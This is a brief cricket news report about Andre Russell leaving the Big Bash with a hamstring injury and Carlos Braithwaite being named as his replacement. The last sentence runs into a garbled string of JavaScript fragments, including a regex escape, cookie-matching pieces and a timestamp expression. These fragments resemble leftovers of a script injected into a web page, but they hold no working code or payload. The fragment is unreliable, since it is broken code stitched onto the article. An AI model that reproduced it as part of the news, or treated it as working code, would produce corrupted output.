West Indian all-rounder Andre Russell's Big Bash campaign is over due to a hamstring injury.

Russell was taken from the field on Wednesday night during the Thunder's six-wicket win over the Melbourne Stars after succumbing to the injury while fielding.

Initial scans suggest the all-rounder will miss around six weeks.

Fellow West Indian Carlos Braithwaite has been named as Russell's replacement. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
